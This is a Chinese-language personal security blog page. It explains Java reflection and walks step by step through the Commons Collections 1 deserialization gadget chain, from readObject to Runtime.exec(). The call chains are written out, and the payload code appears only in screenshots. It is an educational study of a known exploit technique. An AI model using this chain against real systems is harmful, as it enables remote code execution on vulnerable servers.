<link itemprop="mainEntityOfPage" href="http://example.com/2021/11/03/JAVA%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8ECommonsCollections1/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/me.jpg">
<meta itemprop="name" content="GiDunPar">
<meta itemprop="description" content="">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="GiDunPar's Blog">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/2021/11/03/JAVA%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8ECommonsCollections1/" class="post-title-link" itemprop="url">JAVA反序列化与CommonsCollections1</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2021-11-03 14:29:58 / 修改时间:15:27:39" itemprop="dateCreated datePublished" datetime="2021-11-03T14:29:58+08:00">2021-11-03</time>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<h2 id="一、反射机制"><a href="#一、反射机制" class="headerlink" title="一、反射机制"></a>一、反射机制</h2><p>我对反射的理解就是:动态地加载一个类,动态调用类中的方法。</p>
<h3 id="先来看正射"><a href="#先来看正射" class="headerlink" title="先来看正射"></a>先来看正射</h3><p>正射其实就是平时面向对象的流程,定义好一个类后,对他进行实例化。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Apple apple = <span class="keyword">new</span> Apple(); <span class="comment">//直接初始化,「正射」</span></span><br><span class="line">apple.setPrice(<span class="number">4</span>);</span><br></pre></td></tr></table></figure>
<h3 id="再来看反射"><a href="#再来看反射" class="headerlink" title="再来看反射"></a>再来看反射</h3><h4 id="反射加载类"><a href="#反射加载类" class="headerlink" title="反射加载类"></a>反射加载类</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Class clz = Class.forName(<span class="string">"java.lang.String"</span>);</span><br></pre></td></tr></table></figure>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Class clz = String.class;</span><br></pre></td></tr></table></figure>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">String str = <span class="keyword">new</span> String(<span class="string">"Hello"</span>);</span><br><span class="line">Class clz = str.getClass();`</span><br></pre></td></tr></table></figure>
<p>例: </p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.fanshe.demoClass;</span><br><span class="line"><span class="keyword">import</span> com.fanshe.demoClass.demoClass;</span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">fanshe</span> </span>{</span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> ClassNotFoundException </span>{</span><br><span class="line"><span class="comment">// 1.Class.forName(全类名)</span></span><br><span class="line"> Class<?> democlass = Class.forName(<span class="string">"com.fanshe.demoClass.demoClass"</span>);</span><br><span class="line"> System.out.println(democlass);</span><br><span class="line"><span class="comment">// 2.类名.class</span></span><br><span class="line"> Class<?> democlass2 = com.fanshe.demoClass.demoClass.class;</span><br><span class="line"> System.out.println(democlass2);</span><br><span class="line"><span class="comment">// 3.对象.getclass</span></span><br><span class="line"> demoClass democlass3 = <span class="keyword">new</span> demoClass();</span><br><span class="line"> Class<?> democlass4 = democlass3.getClass();</span><br><span class="line"> System.out.println(democlass4);</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h4 id="获取类的公共方法"><a href="#获取类的公共方法" class="headerlink" title="获取类的公共方法"></a>获取类的公共方法</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">getMethods()</span><br></pre></td></tr></table></figure>
<p>例如:</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">demo2</span><span class="params">()</span> <span class="keyword">throws</span> ClassNotFoundException</span>{</span><br><span class="line"> Class<?> demo = Class.forName(<span class="string">"com.fanshe.demoClass.demoClass"</span>);</span><br><span class="line"> Method[] methods = demo.getMethods();</span><br><span class="line"> <span class="keyword">for</span>(Method method:methods){</span><br><span class="line"> System.out.println(method);</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h4 id="获取类的所有方法"><a href="#获取类的所有方法" class="headerlink" title="获取类的所有方法"></a>获取类的所有方法</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">getDeclaredMethods()</span><br></pre></td></tr></table></figure>
<p>例如</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">demo2</span><span class="params">()</span> <span class="keyword">throws</span> ClassNotFoundException</span>{</span><br><span class="line"> Class<?> demo = Class.forName(<span class="string">"com.fanshe.demoClass.demoClass"</span>);</span><br><span class="line"> Method[] methods = demo.getDeclaredMethods();</span><br><span class="line"> <span class="keyword">for</span>(Method method:methods){</span><br><span class="line"> System.out.println(method);</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h4 id="获取类的接口"><a href="#获取类的接口" class="headerlink" title="获取类的接口"></a>获取类的接口</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">getInterfaces()</span><br></pre></td></tr></table></figure>
<p>例如</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">demo3</span><span class="params">()</span> <span class="keyword">throws</span> ClassNotFoundException</span>{</span><br><span class="line"> Class<?> demo = Class.forName(<span class="string">"com.fanshe.demoClass.demoClass"</span>);</span><br><span class="line"> Class<?>[] interfaces = demo.getInterfaces();</span><br><span class="line"> <span class="keyword">for</span>(Class<?> inter:interfaces){</span><br><span class="line"> System.out.println(inter);</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h4 id="获取类的父类"><a href="#获取类的父类" class="headerlink" title="获取类的父类"></a>获取类的父类</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">getSuperclass()</span><br></pre></td></tr></table></figure>
<p>例如</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">demo4</span><span class="params">()</span> <span class="keyword">throws</span> ClassNotFoundException</span>{</span><br><span class="line"> Class<?> demo = Class.forName(<span class="string">"com.fanshe.demoClass.demoClass"</span>);</span><br><span class="line"> Class<?> superclass = demo.getSuperclass();</span><br><span class="line"> System.out.println(superclass);</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h4 id="获取类的构造方法"><a href="#获取类的构造方法" class="headerlink" title="获取类的构造方法"></a>获取类的构造方法</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">getConstructors()</span><br></pre></td></tr></table></figure>
<p>例如</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">demo4</span><span class="params">()</span> <span class="keyword">throws</span> ClassNotFoundException</span>{</span><br><span class="line"> Class<?> demo = Class.forName(<span class="string">"com.fanshe.demoClass.demoClass"</span>);</span><br><span class="line"> Constructor<?>[] constructors = demo.getConstructors();</span><br><span class="line"> <span class="keyword">for</span>(Constructor constructor:constructors){</span><br><span class="line"> System.out.println(constructor);</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h4 id="获取类的公共属性"><a href="#获取类的公共属性" class="headerlink" title="获取类的公共属性"></a>获取类的公共属性</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">getFields()</span><br></pre></td></tr></table></figure>
<p>例如</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">demo4</span><span class="params">()</span> <span class="keyword">throws</span> ClassNotFoundException</span>{</span><br><span class="line"> Class<?> demo = Class.forName(<span class="string">"com.fanshe.demoClass.demoClass"</span>);</span><br><span class="line"> Field[ ] fields = demo.getFields();</span><br><span class="line"> <span class="keyword">for</span>(Field field:fields){</span><br><span class="line"> System.out.println(field);</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h4 id="获取类的所有属性"><a href="#获取类的所有属性" class="headerlink" title="获取类的所有属性"></a>获取类的所有属性</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">getDeclaredField()</span><br></pre></td></tr></table></figure>
<p>例如</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">demo4</span><span class="params">()</span> <span class="keyword">throws</span> ClassNotFoundException</span>{</span><br><span class="line"> Class<?> demo = Class.forName(<span class="string">"com.fanshe.demoClass.demoClass"</span>);</span><br><span class="line"> Field[ ] DeclaredFields = demo.getDeclaredField();</span><br><span class="line"> <span class="keyword">for</span>(Field DeclaredField:DeclaredFields){</span><br><span class="line"> System.out.println(DeclaredField);</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h2 id="二、Commons-Collections1反射链"><a href="#二、Commons-Collections1反射链" class="headerlink" title="二、Commons Collections1反射链"></a>二、Commons Collections1反射链</h2><h3 id="1、TransformedMap链"><a href="#1、TransformedMap链" class="headerlink" title="1、TransformedMap链"></a>1、TransformedMap链</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">ObjectInputStream.readObject()</span><br><span class="line"> AnnotationInvocationHandler.readObject()</span><br><span class="line"> TransformedMap.setValue()</span><br><span class="line"> ChainedTransformer.transform()</span><br><span class="line"> ConstantTransformer.transform()</span><br><span class="line"> InvokerTransformer.transform()</span><br><span class="line"> Method.invoke()</span><br><span class="line"> Class.getMethod()</span><br><span class="line"> InvokerTransformer.transform()</span><br><span class="line"> Method.invoke()</span><br><span class="line"> Runtime.getRuntime()</span><br><span class="line"> InvokerTransformer.transform()</span><br><span class="line"> Method.invoke()</span><br><span class="line"> Runtime.exec()</span><br></pre></td></tr></table></figure>
<h4 id="Transformer"><a href="#Transformer" class="headerlink" title="Transformer"></a>Transformer</h4><p><img src="../images1/1.png" alt="image-20211028101957232"></p>
<h4 id="InvokerTransformer"><a href="#InvokerTransformer" class="headerlink" title="InvokerTransformer"></a>InvokerTransformer</h4><p>Transformer接口的实现类,其transform方法可以通过反射机制执行任意代码</p>
<p><img src="../images1/2.png" alt="image-20211028102033245"></p>
<h4 id="ConstantTransformer"><a href="#ConstantTransformer" class="headerlink" title="ConstantTransformer"></a>ConstantTransformer</h4><p>Transformer接口的实现类,其transform方法直接返回当前对象</p>
<p><img src="../images1/3.png" alt="image-20211028102115286"></p>
<h4 id="ChainedTransformer"><a href="#ChainedTransformer" class="headerlink" title="ChainedTransformer"></a>ChainedTransformer</h4><p>Transformer接口的实现类,其transform方法遍历iTransformers中每一个对象,调用其fransform方法</p>
<p><img src="../images1/4.png" alt="image-20211028102151623"></p>
<h4 id="TransformedMap"><a href="#TransformedMap" class="headerlink" title="TransformedMap"></a>TransformedMap</h4><p>AbstractInputCheckedMapDecorator的实现类,其Decorator方法会把Transformer接口的实现类绑定到Map上,对Map进行操作时,会调用其transform方法</p>
<p><img src="../images1/5.png" alt="image-20211028102456828"></p>
<h3 id="2、ysoserial-Commons-Collections1链"><a href="#2、ysoserial-Commons-Collections1链" class="headerlink" title="2、ysoserial Commons Collections1链"></a>2、ysoserial Commons Collections1链</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">ObjectInputStream.readObject()</span><br><span class="line"> AnnotationInvocationHandler.readObject()</span><br><span class="line"> Map(Proxy).entrySet()</span><br><span class="line"> AnnotationInvocationHandler.invoke()</span><br><span class="line"> LazyMap.get()</span><br><span class="line"> ChainedTransformer.transform()</span><br><span class="line"> ConstantTransformer.transform()</span><br><span class="line"> InvokerTransformer.transform()</span><br><span class="line"> Method.invoke()</span><br><span class="line"> Class.getMethod()</span><br><span class="line"> InvokerTransformer.transform()</span><br><span class="line"> Method.invoke()</span><br><span class="line"> Runtime.getRuntime()</span><br><span class="line"> InvokerTransformer.transform()</span><br><span class="line"> Method.invoke()</span><br><span class="line"> Runtime.exec()</span><br></pre></td></tr></table></figure>
<h4 id="LazyMap"><a href="#LazyMap" class="headerlink" title="LazyMap"></a>LazyMap</h4><p>和TransformedMap一样是AbstractInputCheckedMapDecorator的实现类,区别是使用get去出发transform</p>
<p><img src="../images1/12.png" alt="image-20211028170741543"></p>
<h4 id="AnnotationInvocationHandler-invoke"><a href="#AnnotationInvocationHandler-invoke" class="headerlink" title="AnnotationInvocationHandler.invoke"></a>AnnotationInvocationHandler.invoke</h4><p>该类的初始化传入两个参数,第二个参数为Map类,赋值给成员变量memberValues,invoke方法中调用了get方法</p>
<p><img src="../images1/14.png" alt="image-20211028223057484"></p>
<h4 id="Map-Proxy-entrySet"><a href="#Map-Proxy-entrySet" class="headerlink" title="Map(Proxy).entrySet()"></a>Map(Proxy).entrySet()</h4><p>Map.entrySet()的作用是把HashMap类型的数据转换成集合类型,这里重点是Proxy,他是一个代理对象,如果代理的是AnnotationInvocationHandler,那么代理对象调用任何函数,都会执行一次代理类的invoke函数</p>
<h4 id="AnnotationInvocationHandler-readObject"><a href="#AnnotationInvocationHandler-readObject" class="headerlink" title="AnnotationInvocationHandler.readObject"></a>AnnotationInvocationHandler.readObject</h4><p>在8u171之前,该方法中调用了成员变量memberValues的entrySet方法,而该成员变量就是我们传入的代理对象,即可完成整个链</p>
<p><img src="../images1/15.png" alt="image-20211028225033802"></p>
<h2 id="三、逐级触发"><a href="#三、逐级触发" class="headerlink" title="三、逐级触发"></a>三、逐级触发</h2><h3 id="1、InvokerTransformer"><a href="#1、InvokerTransformer" class="headerlink" title="1、InvokerTransformer"></a>1、InvokerTransformer</h3><p>直接用InvokerTransformer去命令执行,此时我们直接赋值了Runtime.getRuntime()实例,主动触发了transform,利用其中的getMethod方法,获得exec方法,并执行。实际上在反射时我们只能传入一个Runtime.class,只能执行ReadObject方法,寻找调用了transform方法的类</p>
<h3 id="2、ChainedTransformer"><a href="#2、ChainedTransformer" class="headerlink" title="2、ChainedTransformer"></a><img src="../images1/6.png" alt="image-20211028102559894">2、ChainedTransformer</h3><p>该类中的transform方法会循环调用Transformer接口数组中的每一个实现类的transform,并将上一个循环的输出作为下一个循环的输入。前一次我们传入的是Runtime.getRuntime()实例,但是其实我们只能传入Runtime.class,还要获得getMethod、getRuntime、incoke和exec,而ChainedTransformer类中transform方法,刚好适配</p>
<p><img src="../images1/7.png" alt="image-20211028105010299"></p>
<h3 id="3、ConstantTransformer"><a href="#3、ConstantTransformer" class="headerlink" title="3、ConstantTransformer"></a>3、ConstantTransformer</h3><p>上一次是调用transform方法时直接传入了Runtime.class,这是不现实的,反序列化只要ReadObject就好了,该类也是Transform接口的实现类,利用其transform方法,直接返回一个Runtime.class,这样只需new对象的时候赋值即可,上层的transform就不用传参数了</p>
<p><img src="../images1/8.png" alt="image-20211028113152639"></p>
<h3 id="4、TransformedMap"><a href="#4、TransformedMap" class="headerlink" title="4、TransformedMap"></a>4、TransformedMap</h3><p>使用TransformedMap进行命令执行,其put的方法对Map键值进行修改,导致执行transform</p>
<p><img src="../images1/11.png" alt="image-20211028163337333"></p>
<h3 id="5、LazyMap"><a href="#5、LazyMap" class="headerlink" title="5、LazyMap"></a>5、LazyMap</h3><p><img src="../images1/13.png" alt="image-20211028171120488"></p>
<h3 id="6、Map-Proxy-entrySet-—-gt-invoke"><a href="#6、Map-Proxy-entrySet-—-gt-invoke" class="headerlink" title="6、Map(Proxy).entrySet()—>invoke"></a>6、Map(Proxy).entrySet()—>invoke</h3><p><img src="../images1/17.png" alt="image-20211028232559014"></p>
<h3 id="7、readObject—-gt-Map-Proxy-失败"><a href="#7、readObject—-gt-Map-Proxy-失败" class="headerlink" title="7、readObject—>Map(Proxy)失败"></a>7、readObject—>Map(Proxy)失败</h3><p><img src="../images1/16.png" alt="image-20211028225433837"></p>
<p>调试时在invoke函数的get方法处打一个debug,能看到此时的meberValues为LinkedHashMap类,并不是原本传入的Lazymap</p>
<p><img src="../images1/18.png" alt="image-20211028234416294"></p>
<p>因为jdk8中去掉了defaultReadObject,而改为单独填充新变量,导致memberValues为LinkedHashMap对象,报错</p>
<p><img src="../images1/19.png" alt="image-20211028234441744"></p>
<h2 id="四、疑惑"><a href="#四、疑惑" class="headerlink" title="四、疑惑"></a>四、疑惑</h2><h3 id="问题1:new一个Transform接口的数组"><a href="#问题1:new一个Transform接口的数组" class="headerlink" title="问题1:new一个Transform接口的数组?"></a>问题1:new一个Transform接口的数组?</h3><p>接口不能new,这里new的数组里面存储的是实现了Transform接口的对象</p>
<h3 id="问题2:InvokerTransformer里有getMethod了,还要getMethod-getMethod-?"><a href="#问题2:InvokerTransformer里有getMethod了,还要getMethod-getMethod-?" class="headerlink" title="问题2:InvokerTransformer里有getMethod了,还要getMethod(getMethod)?"></a>问题2:InvokerTransformer里有getMethod了,还要getMethod(getMethod)?</h3><p>照我的理解,既然InvokerTransformer有getMethod,那直接用他的getMethod去获取getRuntime就好了,但是报错显示java.lang.class里没有getRuntime,</p>
<p>Java.lang.class.getMethod(getRuntime).invoke(Runtime.class)</p>
<p>Java.lang.class.getMethod(getMethod).invoke(Runtime.class,getRuntime)</p>
<p><img src="../images1/10.png" alt="image-20211028155914985"></p>
<p><img src="../images1/9.png" alt="image-20211028140433511"></p>
<p>如果直接用getMethod获得getRuntime,则此时是java.lang.class去getMethod获得getRuntime,java.lang.class里肯定是没有getRuntime的,报错。</p>
<p>而若让java.lang.class去getMethod获得getMethod,返回的是封装了getMethod方法的Method对象,再利用invoke,并传入参数Runtime.class和getRuntime,则刚好执行了Runtime.class.getMethod(getRuntime),返回了一个封装了getRuntime方法的Method对象,只要再执行一次invoke就可以获得Runtime.getRuntime实例</p>
<h2 id="五、思考"><a href="#五、思考" class="headerlink" title="五、思考"></a>五、思考</h2><p>在我眼里,PHP反序列化的挖掘思路其实就是从反序列化的入口,找遍所有魔术方法,找到能命令执行的链。</p>
<p>但是在JAVA反序列化里这个思路不可行,JAVA反序列化的魔术方法出现的不多,它只有反序列化的入口ReadObject,具体反序列化时调用了哪些方法是可利用的,这个无从考究,但是要一个方法一个方法去看,工作量未免太大。</p>
<p>但是这也有他的好处,当一个方法ban了,可能他只修复了当前类的方法,我们仍旧可以从原链中调用的函数里拼拼凑凑找到其他可以最终用来利用的函数,去年的weblogic就是如此。</p>
<h2 id="七、参考"><a href="#七、参考" class="headerlink" title="七、参考"></a>七、参考</h2><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_39600331/article/details/111677314">https://blog.csdn.net/weixin_39600331/article/details/111677314</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/nice0e3/p/13791793.html">https://www.cnblogs.com/nice0e3/p/13791793.html</a></p>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="http://example.com/2021/02/22/Test/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/me.jpg">
<meta itemprop="name" content="GiDunPar">
<meta itemprop="description" content="">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="GiDunPar's Blog">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/2021/02/22/Test/" class="post-title-link" itemprop="url">Test</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2021-02-22 22:00:57 / 修改时间:22:46:13" itemprop="dateCreated datePublished" datetime="2021-02-22T22:00:57+08:00">2021-02-22</time>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<p><em>Demo blog~</em></p>
<p>Welcome my friends</p>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
</div>
<script>
window.addEventListener('tabs:register', () => {
let { activeClass } = CONFIG.comments;
if (CONFIG.comments.storage) {
activeClass = localStorage.getItem('comments_active') || activeClass;
}
if (activeClass) {
let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
if (activeTab) {
activeTab.click();
}
}
});
if (CONFIG.comments.storage) {
window.addEventListener('tabs:click', event => {
if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
let commentClass = event.target.classList[1];
localStorage.setItem('comments_active', commentClass);
});
}
</script>
</div>
<div class="toggle sidebar-toggle">
<span class="toggle-line toggle-line-first"></span>
<span class="toggle-line toggle-line-middle"></span>
<span class="toggle-line toggle-line-last"></span>
</div>
<aside class="sidebar">
<div class="sidebar-inner">
<ul class="sidebar-nav motion-element">
<li class="sidebar-nav-toc">
文章目录
</li>
<li class="sidebar-nav-overview">
站点概览
</li>
</ul>
<!--noindex-->
<div class="post-toc-wrap sidebar-panel">
</div>
<!--/noindex-->
<div class="site-overview-wrap sidebar-panel">
<div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
<img class="site-author-image" itemprop="image" alt="GiDunPar"
src="/images/me.jpg">
<p class="site-author-name" itemprop="name">GiDunPar</p>
<div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
<nav class="site-state">
<div class="site-state-item site-state-posts">
<a href="/archives/">
<span class="site-state-item-count">3</span>
<span class="site-state-item-name">日志</span>
</a>
</div>
</nav>
</div>
</div>
<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=20954632&auto=1&height=66"></iframe>
</div>
</aside>
<div id="sidebar-dimmer"></div>
</div>
</main>
<footer class="footer">
<div class="footer-inner">
<div class="copyright">
©
<span itemprop="copyrightYear">2021</span>
<span class="with-love">
<i class="fa fa-heart"></i>
</span>
<span class="author" itemprop="copyrightHolder">GiDunPar</span>
<div>
<a target="_blank" rel="noopener" href="https://beian.miit.gov.cn/">闽ICP备2021002925号-1</a>
</div>
</div>
<!--
<div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
</div>
-->
</div>
</footer>
</div>
<script color='0,0,0' opacity='0.99' zIndex='-1' count='99' src="/lib/canvas-nest/canvas-nest.min.js"></script>
<script size="300" alpha="0.6" zIndex="-1" src="/lib/canvas-ribbon/canvas-ribbon.js"></script>
<script src="/lib/anime.min.js"></script>
<script src="/lib/velocity/velocity.min.js"></script>
<script src="/lib/velocity/velocity.ui.min.js"></script>
<script src="/js/utils.js"></script>
<script src="/js/motion.js"></script>
<script src="/js/schemes/pisces.js"></script>
<script src="/js/next-boot.js"></script>
</body>
</html>